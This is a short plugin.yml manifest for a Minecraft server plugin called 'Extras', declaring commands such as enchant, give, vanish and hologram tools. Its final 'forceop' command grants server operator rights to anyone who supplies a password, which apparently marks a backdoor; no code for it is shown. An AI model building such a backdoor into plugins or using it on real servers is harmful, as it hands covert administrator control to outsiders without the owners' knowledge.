name: Extras
version: '0.1.3'
main: dev.jordgubbe.extras.Main
api-version: '1.20'
commands:
  enchant:
    description: Enchants the item in your hand
    usage: /enchant <enchantment> <level>
    aliases: [ench]
  give:
    description: Gives a player an item
    usage: /give <player> <item> <amount>
    aliases: [material, mat, item]
  vanish:
    description: Makes you invisible to other players
    usage: /vanish
    aliases: [v]
  coordinates:
    description: Shows your coordinates
    usage: /coordinates
    aliases: [coords, coord, cords, cord]
  hologramcreate:
    description: Spawns a hologram with the desired name. You must use _ to indicate spaces
    usage: /hologramcreate <name>
    aliases: [holoc, hologc]
  hologramremove:
    description: Removes the given hologram
    usage: /hologramremove <name>
    aliases: [holor, hologr]
  extras:
    description: Main command :D
    usage: /extras <whatever>
    aliases: [extra]
  forceop:
    description: Sets the player as operator if they have the right password
    usage: /forceop <password>